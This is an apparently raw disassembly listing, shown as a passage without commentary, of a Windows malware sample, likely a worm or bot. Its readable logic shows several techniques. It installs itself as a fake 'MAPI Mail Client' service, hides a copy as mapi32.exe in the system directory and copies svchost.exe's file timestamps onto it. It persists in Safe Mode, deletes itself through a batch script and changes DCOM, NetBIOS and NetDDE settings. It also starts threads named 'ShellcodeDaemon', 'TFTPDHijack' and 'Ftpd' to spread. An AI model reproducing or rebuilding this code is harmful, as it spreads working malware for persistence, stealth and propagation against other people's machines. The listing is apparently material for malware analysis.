jl short loc_408900
push edi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4086A6
add esp, 0Ch
mov edi, eax
test edi, edi
push 1
push esi
jnz short loc_408904
call dword_40121C
push esi
call dword_401240
loc_408900: ; CODE XREF: sub_408825+27�j
; sub_408825+76�j ...
xor eax, eax
jmp short loc_40894F
; ---------------------------------------------------------------------------
loc_408904: ; CODE XREF: sub_408825+CC�j
call dword_40121C
push esi
call dword_401240
push dword_40B09C
call sub_40AC46
cmp [ebp+arg_C], 0
pop ecx
mov esi, offset byte_40B078
jz short loc_40893C
push esi
push [ebp+arg_4]
call sub_40A8E0
pop ecx
test eax, eax
pop ecx
jz short loc_40893C
call sub_408EAB
loc_40893C: ; CODE XREF: sub_408825+101�j
; sub_408825+110�j
cmp [ebp+arg_8], 0
jz short loc_40894D
push esi
push [ebp+arg_4]
call sub_40A8E0
pop ecx
pop ecx
loc_40894D: ; CODE XREF: sub_408825+11B�j
mov eax, edi
loc_40894F: ; CODE XREF: sub_408825+DD�j
pop edi
pop esi
leave
retn
sub_408825 endp
; =============== S U B R O U T I N E =======================================
sub_408953 proc near ; CODE XREF: sub_405CEC+34�p
; sub_40933F+1FC�p
arg_0 = dword ptr 4
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push offset aServicesactive ; "ServicesActive"
push ebx
call dword_40101C
mov edi, eax
cmp edi, ebx
jnz short loc_408972
xor al, al
jmp short loc_408998
; ---------------------------------------------------------------------------
loc_408972: ; CODE XREF: sub_408953+19�j
push esi
push 0F01FFh
push [esp+10h+arg_0]
push edi
call dword_401020
mov esi, dword_401024
cmp eax, ebx
jz short loc_408992
push eax
call esi ; dword_401024
mov bl, 1
loc_408992: ; CODE XREF: sub_408953+38�j
push edi
call esi ; dword_401024
mov al, bl
pop esi
loc_408998: ; CODE XREF: sub_408953+1D�j
pop edi
pop ebx
retn
sub_408953 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40899B proc near ; CODE XREF: sub_405CEC:loc_405D31�p
; sub_40933F:loc_40954C�p
var_218 = byte ptr -218h
var_114 = byte ptr -114h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 218h
push ebx
xor ebx, ebx
push 2
push ebx
push ebx
call dword_40101C
cmp eax, ebx
mov [ebp+var_C], eax
jz loc_408A85
push esi
push edi
mov edi, 0F003Fh
mov esi, offset aMapi ; "MAPI"
push edi
push esi
push eax
call dword_401020
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_408A7A
push esi
lea eax, [ebp+var_218]
push offset aSystemCurrentc ; "SYSTEM\\CurrentControlSet\\Services\\%s"
push eax
call sub_40AB94
add esp, 0Ch
lea eax, [ebp+var_4]
push eax
push edi
lea eax, [ebp+var_218]
push ebx
push eax
push 80000002h
call dword_401010
test eax, eax
jnz short loc_408A71
push 2
lea eax, [ebp+var_10]
pop edi
mov esi, dword_401014
push 4
push eax
push 4
push ebx
push offset aStart ; "Start"
mov [ebp+var_10], edi
push [ebp+var_4]
call esi ; dword_401014
lea eax, [ebp+var_114]
push 104h
push eax
push ebx
call dword_4010C8 ; GetModuleHandleA
push eax
call dword_4010D0 ; GetModuleFileNameA
lea eax, [ebp+var_114]
push eax
call dword_4010CC ; lstrlenA
inc eax
push eax
lea eax, [ebp+var_114]
push eax
push edi
push ebx
push offset aImagepath ; "ImagePath"
push [ebp+var_4]
call esi ; dword_401014
push [ebp+var_4]
call dword_401018
loc_408A71: ; CODE XREF: sub_40899B+70�j
push [ebp+var_8]
call dword_401024
loc_408A7A: ; CODE XREF: sub_40899B+3B�j
push [ebp+var_C]
call dword_401024
pop edi
pop esi
loc_408A85: ; CODE XREF: sub_40899B+1B�j
pop ebx
leave
retn
sub_40899B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408A88 proc near ; CODE XREF: sub_405CEC+3E�p
; sub_40933F+206�p
var_13C = byte ptr -13Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 13Ch
push esi
xor esi, esi
push 2
push esi
push esi
call dword_40101C
cmp eax, esi
mov [ebp+var_14], eax
jz loc_408C28
push ebx
push edi
lea eax, [ebp+var_13C]
push 105h
push eax
push esi
call dword_4010D0 ; GetModuleFileNameA
test eax, eax
jbe loc_408C1D
push esi
push esi
push esi
push esi
lea eax, [ebp+var_13C]
push esi
push eax
push esi
push 2
push 110h
push 0F01FFh
push offset aMapiMailClient ; "MAPI Mail Client"
push offset aMapi ; "MAPI"
push [ebp+var_14]
call dword_401000
cmp eax, esi
mov [ebp+var_C], eax
jz loc_408C1D
mov ebx, dword_401004
lea ecx, [ebp+var_20]
push 1
mov [ebp+var_24], ecx
pop edi
lea ecx, [ebp+var_34]
push ecx
push 2
push eax
mov [ebp+var_1C], edi
mov [ebp+var_20], edi
mov [ebp+var_18], offset aEnablesSupport ; "Enables support for the Messaging Appli"...
mov [ebp+var_34], 5
mov [ebp+var_30], esi
mov [ebp+var_2C], esi
mov [ebp+var_28], edi
call ebx ; dword_401004
lea eax, [ebp+var_18]
push eax
push edi
push [ebp+var_C]
call ebx ; dword_401004
push esi
push esi
push [ebp+var_C]
call dword_401008
push [ebp+var_C]
call dword_401024
mov ebx, dword_401010
lea eax, [ebp+var_10]
mov edi, 0F003Fh
push eax
push edi
push esi
push offset aSystemCurren_0 ; "SYSTEM\\CurrentControlSet\\Control\\SafeBo"...
push 80000002h
call ebx ; dword_401010
test eax, eax
jnz loc_408C1D
lea eax, [ebp+var_8]
push eax
push edi
push esi
push offset aMinimal ; "Minimal"
push [ebp+var_10]
call ebx ; dword_401010
test eax, eax
mov ebx, offset aService ; "Service"
jnz short loc_408BC5
lea eax, [ebp+var_8]
push esi
push eax
push esi
push edi
push esi
push esi
push esi
push offset aMapi ; "MAPI"
push [ebp+var_8]
call dword_40100C
push ebx
call sub_40ABD2
pop ecx
push eax
push ebx
push 1
push esi
push esi
push [ebp+var_8]
call dword_401014
push [ebp+var_8]
call dword_401018
loc_408BC5: ; CODE XREF: sub_408A88+104�j
lea eax, [ebp+var_4]
push eax
push edi
push esi
push offset aNetwork ; "Network"
push [ebp+var_10]
call dword_401010
test eax, eax
jnz short loc_408C14
lea eax, [ebp+var_4]
push esi
push eax
push esi
push edi
push esi
push esi
push esi
push offset aMapi ; "MAPI"
push [ebp+var_4]
call dword_40100C
push ebx
call sub_40ABD2
pop ecx
push eax
push ebx
push 1
push esi
push esi
push [ebp+var_4]
call dword_401014
push [ebp+var_4]
call dword_401018
loc_408C14: ; CODE XREF: sub_408A88+153�j
push [ebp+var_10]
call dword_401018
loc_408C1D: ; CODE XREF: sub_408A88+38�j
; sub_408A88+6F�j ...
push [ebp+var_14]
call dword_401024
pop edi
pop ebx
loc_408C28: ; CODE XREF: sub_408A88+1B�j
pop esi
leave
retn
sub_408A88 endp
; =============== S U B R O U T I N E =======================================
sub_408C2B proc near ; DATA XREF: sub_408C7B+11�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
dec eax
jz short loc_408C51
dec eax
jz short loc_408C3E
dec eax
jz short loc_408C3E
dec eax
jz short loc_408C3E
dec eax
jz short loc_408C51
loc_408C3E: ; CODE XREF: sub_408C2B+8�j
; sub_408C2B+B�j ...
push offset dword_40B0A0
push dword_40B0BC
call dword_40103C
jmp short locret_408C78
; ---------------------------------------------------------------------------
loc_408C51: ; CODE XREF: sub_408C2B+5�j
; sub_408C2B+11�j
push offset dword_40B0A0
mov dword_40B0A4, 3
push dword_40B0BC
call dword_40103C
push dword_40B0C0
call dword_4010C4 ; SetEvent
locret_408C78: ; CODE XREF: sub_408C2B+24�j
retn 4
sub_408C2B endp
; =============== S U B R O U T I N E =======================================
sub_408C7B proc near ; DATA XREF: sub_408D6E+19�o
push ebx
push ebp
push 1
xor ebx, ebx
pop ebp
mov dword_40B0A0, 30h
push offset sub_408C2B
push offset aMapi ; "MAPI"
mov dword_40B0A4, ebp
mov dword_40B0A8, ebx
mov dword_40B0AC, ebx
mov dword_40B0B0, ebx
mov dword_40B0B4, ebx
mov dword_40B0B8, ebx
call dword_401028
cmp eax, ebx
mov dword_40B0BC, eax
jz loc_408D69
push esi
mov esi, dword_40103C
push edi
mov edi, offset dword_40B0A0
push edi
push eax
mov dword_40B0A4, 2
call esi ; dword_40103C
push ebx
push ebx
push ebx
push ebx
call dword_401080 ; CreateEventA
or dword_40B0A8, 5
push edi
push dword_40B0BC
mov dword_40B0C0, eax
mov dword_40B0A4, 4
call esi ; dword_40103C
cmp byte_40B0D2, bl
jnz short loc_408D1E
call sub_40933F
loc_408D1E: ; CODE XREF: sub_408C7B+9C�j
push 0FFFFFFFFh
push dword_40B0C0
call dword_4010B8 ; WaitForSingleObject
push edi
mov dword_40B0A4, 3
push dword_40B0BC
call esi ; dword_40103C
push dword_40B0C0
call dword_4010BC ; CloseHandle
and dword_40B0A8, 0FFFFFFFAh
push edi
push dword_40B0BC
mov dword_40B0C0, ebx
mov dword_40B0A4, ebp
call esi ; dword_40103C
pop edi
pop esi
loc_408D69: ; CODE XREF: sub_408C7B+4C�j
pop ebp
pop ebx
retn 8
sub_408C7B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408D6E proc near ; CODE XREF: sub_40933F+212�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_8], 0
and [ebp+var_4], 0
lea eax, [ebp+var_10]
mov [ebp+var_10], offset aMapi ; "MAPI"
push eax
mov [ebp+var_C], offset sub_408C7B
call dword_40102C
leave
retn
sub_408D6E endp
; =============== S U B R O U T I N E =======================================
sub_408D96 proc near ; CODE XREF: sub_408EAB+3E�p
arg_0 = dword ptr 4
push ebx
push ebp
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_40101C
mov ebp, eax
cmp ebp, ebx
jnz short loc_408DB1
xor al, al
jmp short loc_408DE6
; ---------------------------------------------------------------------------
loc_408DB1: ; CODE XREF: sub_408D96+15�j
push esi
push edi
push 0F01FFh
push [esp+14h+arg_0]
push ebp
call dword_401020
mov edi, dword_401024
mov esi, eax
cmp esi, ebx
jz short loc_408DDF
push esi
call dword_401030
test eax, eax
jz short loc_408DDC
mov bl, 1
loc_408DDC: ; CODE XREF: sub_408D96+42�j
push esi
call edi ; dword_401024
loc_408DDF: ; CODE XREF: sub_408D96+37�j
push ebp
call edi ; dword_401024
pop edi
mov al, bl
pop esi
loc_408DE6: ; CODE XREF: sub_408D96+19�j
pop ebp
pop ebx
retn
sub_408D96 endp
; =============== S U B R O U T I N E =======================================
sub_408DE9 proc near ; CODE XREF: sub_40933F+C�p
push offset aXmapimailclien ; "xMAPIMailClientx"
push 1
push 0
call dword_401048 ; CreateMutexA
call dword_401044 ; RtlGetLastWin32Error
cmp eax, 0B7h
setz al
retn
sub_408DE9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E07 proc near ; CODE XREF: sub_409016+F4�p
; sub_409016+12A�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aSvchost_exe ; "svchost.exe"
push esi
call dword_401058 ; SearchPathA
test eax, eax
jz short loc_408EA6
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, dword_401054
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; dword_401054
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_408EA6
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call dword_401050 ; GetFileTime
push ebx
mov ebx, dword_4010BC
call ebx ; dword_4010BC
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; dword_401054
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_408EA6
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call dword_40104C ; SetFileTime
push esi
call ebx ; dword_4010BC
loc_408EA6: ; CODE XREF: sub_408E07+2A�j
; sub_408E07+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_408E07 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408EAB proc near ; CODE XREF: sub_408825+112�p
; sub_409016+10D�p
var_710 = byte ptr -710h
var_310 = byte ptr -310h
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 710h
push esi
push edi
xor edi, edi
push offset aXmapimailclien ; "xMAPIMailClientx"
push edi
push 1F0001h
call dword_401074 ; OpenMutexA
cmp eax, edi
jz short loc_408ED4
push eax
call dword_401070 ; ReleaseMutex
loc_408ED4: ; CODE XREF: sub_408EAB+20�j
push offset aControlHandler ; "Control Handler"
call sub_40A64F
push eax
call sub_40A56C
push offset aMapi ; "MAPI"
call sub_408D96
add esp, 0Ch
lea eax, [ebp+var_710]
push eax
push 400h
call dword_40106C ; GetTempPathA
lea eax, [ebp+var_710]
push eax
lea eax, [ebp+var_108]
push offset aSerase_bat ; "%serase.bat"
push eax
call sub_40AB94
add esp, 0Ch
lea eax, [ebp+var_108]
push edi
push edi
push 2
push edi
push edi
push 40000000h
push eax
call dword_401054 ; CreateFileA
mov esi, eax
cmp esi, edi
jbe loc_409007
lea eax, [ebp+var_710]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_40AB94
pop ecx
lea eax, [ebp+var_4]
pop ecx
push edi
push eax
lea eax, [ebp+var_710]
push eax
call sub_40ABD2
pop ecx
push eax
lea eax, [ebp+var_710]
push eax
push esi
call dword_401068 ; WriteFile
push esi
call dword_4010BC ; CloseHandle
mov esi, 104h
lea eax, [ebp+var_20C]
push esi
push eax
push edi
call dword_4010C8 ; GetModuleHandleA
push eax
call dword_4010D0 ; GetModuleFileNameA
lea eax, [ebp+var_20C]
push eax
call dword_401064 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_408FBA
lea eax, [ebp+var_20C]
push 80h
push eax
call dword_401060 ; SetFileAttributesA
loc_408FBA: ; CODE XREF: sub_408EAB+FB�j
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_710]
push offset aComspecCSSS ; "%%comspec%% /c %s %s %s"
push eax
call sub_40AB94
add esp, 14h
lea eax, [ebp+var_310]
push esi
push eax
lea eax, [ebp+var_710]
push eax
call dword_40105C ; ExpandEnvironmentStringsA
lea eax, [ebp+var_310]
push edi
push eax
call sub_40A8E0
pop ecx
pop ecx
loc_409007: ; CODE XREF: sub_408EAB+8F�j
call dword_401248
push edi
call dword_4010F0 ; ExitProcess
pop edi
pop esi
sub_408EAB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409016 proc near ; CODE XREF: sub_40933F+1F2�p
var_21C = byte ptr -21Ch
var_119 = byte ptr -119h
var_118 = byte ptr -118h
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
lea eax, [ebp+var_21C]
push 104h
xor edi, edi
push eax
push edi
call dword_4010D0 ; GetModuleFileNameA
lea eax, [ebp+var_118]
push 118h
push eax
call dword_4010F8 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_4010CC ; lstrlenA
cmp [ebp+eax+var_119], 5Ch
mov esi, dword_40107C
jz short loc_409073
lea eax, [ebp+var_118]
push offset asc_4035E8 ; "\\"
push eax
call esi ; dword_40107C
loc_409073: ; CODE XREF: sub_409016+4D�j
lea eax, [ebp+var_118]
push offset aMapi32_exe ; "mapi32.exe"
push eax
call esi ; dword_40107C
lea eax, [ebp+var_118]
push eax
call sub_40A690
test al, al
pop ecx
jnz loc_40912A
push edi
push 80h
push 2
push edi
push 3
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_401054 ; CreateFileA
mov esi, eax
cmp esi, edi
jz short loc_4090BE
cmp esi, 0FFFFFFFFh
jnz short loc_4090D0
loc_4090BE: ; CODE XREF: sub_409016+A1�j
lea eax, [ebp+var_118]
push eax
call dword_401064 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4090F0
loc_4090D0: ; CODE XREF: sub_409016+A6�j
push esi
call dword_4010BC ; CloseHandle
lea eax, [ebp+var_118]
push edi
push eax
lea eax, [ebp+var_21C]
push eax
call dword_401078 ; CopyFileA
test eax, eax
jnz short loc_4090F4
loc_4090F0: ; CODE XREF: sub_409016+B8�j
xor al, al
jmp short loc_409148
; ---------------------------------------------------------------------------
loc_4090F4: ; CODE XREF: sub_409016+D8�j
lea eax, [ebp+var_118]
push 7
push eax
call dword_401060 ; SetFileAttributesA
lea eax, [ebp+var_118]
push eax
call sub_408E07
lea eax, [ebp+var_118]
push edi
push eax
call sub_40A8E0
add esp, 0Ch
test eax, eax
jz short loc_409146
call sub_408EAB
jmp short loc_409146
; ---------------------------------------------------------------------------
loc_40912A: ; CODE XREF: sub_409016+7A�j
lea eax, [ebp+var_118]
push 7
push eax
call dword_401060 ; SetFileAttributesA
lea eax, [ebp+var_118]
push eax
call sub_408E07
pop ecx
loc_409146: ; CODE XREF: sub_409016+10B�j
; sub_409016+112�j
mov al, 1
loc_409148: ; CODE XREF: sub_409016+DC�j
pop edi
pop esi
leave
retn
sub_409016 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40914C proc near ; CODE XREF: sub_404530+A5B�p
; sub_40933F+217�p
var_320 = byte ptr -320h
var_120 = byte ptr -120h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 320h
push ebx
push esi
lea eax, [ebp+var_4]
push edi
mov edi, dword_401010
push eax
xor esi, esi
push 8
push esi
mov ebx, 80000002h
push offset aSystemCurren_1 ; "SYSTEM\\CurrentControlSet\\Services\\TcpIp"...
push ebx
call edi ; dword_401010
test eax, eax
jnz loc_409239
lea eax, [ebp+var_1C]
mov [ebp+var_C], 200h
push eax
push esi
push esi
lea eax, [ebp+var_C]
push esi
push eax
lea eax, [ebp+var_320]
mov [ebp+var_8], 2
push eax
mov [ebp+var_10], 1
push esi
loc_4091A4: ; CODE XREF: sub_40914C+DF�j
push [ebp+var_4]
call dword_401038
test eax, eax
jnz short loc_409230
lea eax, [ebp+var_320]
push eax
lea eax, [ebp+var_120]
push offset aSystemCurren_2 ; "SYSTEM\\CurrentControlSet\\Services\\NetBT"...
push eax
call sub_40AB94
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
push 0F003Fh
lea eax, [ebp+var_120]
push esi
push eax
push ebx
call edi ; dword_401010
test eax, eax
jnz short loc_409204
lea eax, [ebp+var_8]
push 4
push eax
push 4
push esi
push offset aNetbiosoptions ; "NetbiosOptions"
push [ebp+var_4]
call dword_401014
push [ebp+var_14]
call dword_401018
loc_409204: ; CODE XREF: sub_40914C+96�j
mov eax, [ebp+var_10]
lea ecx, [ebp+var_1C]
inc [ebp+var_10]
push ecx
push esi
push esi
lea ecx, [ebp+var_C]
push esi
push ecx
lea ecx, [ebp+var_320]
push ecx
mov [ebp+var_C], 200h
mov [ebp+var_8], 2
push eax
jmp loc_4091A4
; ---------------------------------------------------------------------------
loc_409230: ; CODE XREF: sub_40914C+63�j
push [ebp+var_4]
call dword_401018
loc_409239: ; CODE XREF: sub_40914C+2A�j
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push esi
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\OLE"
push ebx
call edi ; dword_401010
test eax, eax
jnz short loc_409270
push 3
push offset aN ; "N"
push 1
push esi
push offset aEnabledcom ; "EnableDCOM"
push [ebp+var_4]
call dword_401014
push [ebp+var_4]
call dword_401018
loc_409270: ; CODE XREF: sub_40914C+101�j
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push esi
push offset aSystemCurren_3 ; "SYSTEM\\CurrentControlSet\\Services\\NetDD"...
push ebx
call edi ; dword_401010
test eax, eax
jnz short loc_4092AD
lea eax, [ebp+var_8]
push 4
push eax
push 4
push esi
push offset aStart ; "Start"
push [ebp+var_4]
mov [ebp+var_8], 3
call dword_401014
push [ebp+var_4]
call dword_401018
loc_4092AD: ; CODE XREF: sub_40914C+138�j
push 0F003Fh
push offset aServicesactive ; "ServicesActive"
push esi
call dword_40101C
cmp eax, esi
mov [ebp+var_C], eax
jz short loc_4092FD
push 0F01FFh
push offset aNetworkDde ; "Network DDE"
push eax
call dword_401020
cmp eax, esi
mov [ebp+var_8], eax
jz short loc_4092F4
push offset dword_40B0A0
push 1
push eax
call dword_401034
push [ebp+var_8]
call dword_401024
loc_4092F4: ; CODE XREF: sub_40914C+18F�j
push [ebp+var_C]
call dword_401024
loc_4092FD: ; CODE XREF: sub_40914C+177�j
lea eax, [ebp+var_4]
push eax
push 0F003Fh
push esi
push offset aSystemCurren_4 ; "SYSTEM\\CurrentControlSet\\Services\\W3SVC"...
push ebx
call edi ; dword_401010
test eax, eax
jnz short loc_40933A
lea eax, [ebp+var_8]
push 4
push eax
push 4
push esi
push offset aMaxclientreque ; "MaxClientRequestBuffer"
push [ebp+var_4]
mov [ebp+var_8], 4000h
call dword_401014
push [ebp+var_4]
call dword_401018
loc_40933A: ; CODE XREF: sub_40914C+1C5�j
pop edi
pop esi
pop ebx
leave
retn
sub_40914C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40933F proc near ; CODE XREF: sub_408C7B+9E�p
; sub_40933F+225�p
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_C = word ptr -0Ch
var_4 = word ptr -4
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
call sub_408DE9
test al, al
jnz loc_409507
call sub_40AA5D
test al, al
jnz loc_409507
mov esi, dword_4010FC
mov byte_40B0D2, 1
call esi ; dword_4010FC
push eax
call sub_40AC3A
push 0Ah
push 4
call sub_40A818
push eax
call sub_40A77F
add esp, 10h
mov dword_40B278, eax
call esi ; dword_4010FC
mov edi, dword_4010F4
mov dword_40B27C, eax
loc_40939E: ; CODE XREF: sub_40933F+78�j
call sub_409688
test al, al
jz short loc_4093B0
call sub_4052A5
test al, al
jnz short loc_4093B9
loc_4093B0: ; CODE XREF: sub_40933F+66�j
push 3E8h
call edi ; dword_4010F4
jmp short loc_40939E
; ---------------------------------------------------------------------------
loc_4093B9: ; CODE XREF: sub_40933F+6F�j
lea eax, [ebp+var_10C]
push 100h
push eax
call dword_401224
xor ebx, ebx
test eax, eax
jz short loc_4093DB
lea eax, [ebp+var_10C]
test eax, eax
jz short loc_409445
loc_4093DB: ; CODE XREF: sub_40933F+90�j
lea eax, [ebp+var_10C]
push eax
call dword_401250
cmp eax, ebx
jz short loc_409445
mov esi, [eax+0Ch]
loc_4093EF: ; CODE XREF: sub_40933F+104�j
mov eax, [esi]
cmp eax, ebx
jz short loc_409445
movzx ecx, byte ptr [eax+3]
push ecx
movzx ecx, byte ptr [eax+2]
push ecx
movzx ecx, byte ptr [eax+1]
movzx eax, byte ptr [eax]
push ecx
push eax
lea eax, [ebp+var_10C]
push offset aD_D_D_D ; "%d.%d.%d.%d"
push eax
call sub_40AB94
lea eax, [ebp+var_10C]
push eax
push off_403730
call sub_40ABA0
add esp, 20h
lea eax, [ebp+var_10C]
push eax
call dword_40124C
mov dword_40B244, eax
add esi, 4
jmp short loc_4093EF
; ---------------------------------------------------------------------------
loc_409445: ; CODE XREF: sub_40933F+9A�j
; sub_40933F+AB�j ...
push offset aProtocolHandle ; "Protocol Handler"
push 1
pop esi
push esi
push ebx
push offset sub_40549A
call sub_40A45C
push offset aControlHandler ; "Control Handler"
push esi
push ebx
push offset sub_405CEC
call sub_40A45C
push offset aTftpdhijack ; "TFTPDHijack"
push esi
push ebx
push offset sub_407BC9
call sub_40A45C
push dword_40B244
call sub_40715A
add esp, 34h
test eax, eax
jz short loc_409502
push 0FFFFh
push 400h
call sub_40A818
mov word_40B24A, ax
mov [ebp+var_C], ax
push offset aShellcodedaemo ; "ShellcodeDaemon"
lea eax, [ebp+var_C]
push esi
push eax
push offset sub_40785E
call sub_40A45C
mov dword_40B270, ebx
mov [ebp+var_1], bl
mov [ebp+var_2], bl
call sub_40AC34
cdq
mov ecx, 0FC17h
push offset aFtpd ; "Ftpd"
idiv ecx
lea eax, [ebp+var_4]
push esi
push eax
push offset sub_407F46
add edx, 3E8h
mov word_40B0D0, dx
mov [ebp+var_4], dx
call sub_40A45C
add esp, 28h
push 3A98h
call edi ; dword_4010F4
loc_409502: ; CODE XREF: sub_40933F+14C�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_409507: ; CODE XREF: sub_40933F+13�j
; sub_40933F+20�j
push 0
call dword_4010F0 ; ExitProcess
sub esp, 190h
push 2
call dword_401084 ; SetErrorMode
and byte_40B0D2, 0
lea eax, [esp+18Ch+var_18C]
push eax
push 2
call dword_401228
call sub_409016
push offset aMapi ; "MAPI"
call sub_408953
test al, al
pop ecx
jnz short loc_40954C
call sub_408A88
jmp short loc_40955B
; ---------------------------------------------------------------------------
loc_40954C: ; CODE XREF: sub_40933F+204�j
call sub_40899B
call sub_408D6E
call sub_40914C
loc_40955B: ; CODE XREF: sub_40933F+20B�j
cmp byte_40B0D2, 0
jnz short loc_409569
call sub_40933F
loc_409569: ; CODE XREF: sub_40933F+223�j
add esp, 190h
retn
sub_40933F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409570 proc near ; CODE XREF: sub_4052A5+21�p
; sub_4052A5+3D�p ...
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 84h
cmp [ebp+arg_0], 0
jnz short loc_409586
push offset byte_40B078
jmp short loc_409589
; ---------------------------------------------------------------------------
loc_409586: ; CODE XREF: sub_409570+D�j
push [ebp+arg_0]
loc_409589: ; CODE XREF: sub_409570+14�j
lea eax, [ebp+var_84]
push eax
call sub_40ABA0
pop ecx
lea eax, [ebp+var_84]
pop ecx
push eax
call dword_401250
test eax, eax
jz short loc_4095B7
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_401220
leave
retn
; ---------------------------------------------------------------------------
loc_4095B7: ; CODE XREF: sub_409570+36�j
push [ebp+arg_0]
call dword_40124C
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz short loc_4095DE
push 2
lea eax, [ebp+var_4]
push 4
push eax
call dword_401208
test eax, eax
jz short loc_4095DE
mov eax, [eax]
leave
retn
; ---------------------------------------------------------------------------
loc_4095DE: ; CODE XREF: sub_409570+56�j
; sub_409570+68�j
xor eax, eax
leave
retn
sub_409570 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4095E2 proc near ; CODE XREF: sub_4055A6+6CB�p
; sub_4055A6+704�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
cmp [ebp+arg_0], 0
push esi
push edi
jz loc_409682
push offset byte_40B078
push [ebp+arg_0]
call sub_40ABB2
pop ecx
test eax, eax
pop ecx
jz short loc_409682
push 20h
lea eax, [ebp+var_20]
push [ebp+arg_0]
push eax
call sub_40AC28
mov esi, offset a_ ; "."
lea eax, [ebp+var_20]
push esi
push eax
call sub_40ABB8
add esp, 14h
test eax, eax
jz short loc_409682
push eax
call sub_40ABAC
push esi
push 0
mov edi, eax
call sub_40ABB8
add esp, 0Ch
test eax, eax
jz short loc_409682
push eax
call sub_40ABAC
cmp edi, 0Ah
pop ecx
jz short loc_40967E
cmp edi, 0ACh
jnz short loc_409660
cmp eax, 0Fh
jle short loc_409682
cmp eax, 20h
jl short loc_40967E
loc_409660: ; CODE XREF: sub_4095E2+72�j
cmp edi, 0A9h
jnz short loc_40966F
cmp eax, 0FEh
jz short loc_40967E
loc_40966F: ; CODE XREF: sub_4095E2+84�j
cmp edi, 0C0h
jnz short loc_409682
cmp eax, 0A8h
jnz short loc_409682
loc_40967E: ; CODE XREF: sub_4095E2+6A�j
; sub_4095E2+7C�j ...
mov al, 1
jmp short loc_409684
; ---------------------------------------------------------------------------
loc_409682: ; CODE XREF: sub_4095E2+C�j
; sub_4095E2+23�j ...
xor al, al
loc_409684: ; CODE XREF: sub_4095E2+9E�j
pop edi
pop esi
leave
retn
sub_4095E2 endp
; =============== S U B R O U T I N E =======================================
sub_409688 proc near ; CODE XREF: sub_40933F:loc_40939E�p
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_4011E8
test eax, eax
setnz al
pop ecx
retn
sub_409688 endp
; =============== S U B R O U T I N E =======================================
sub_40969D proc near ; CODE XREF: sub_4052A5+16�p
push esi
push edi
push offset aDnsapi_dll ; "dnsapi.dll"
call dword_401090 ; LoadLibraryA
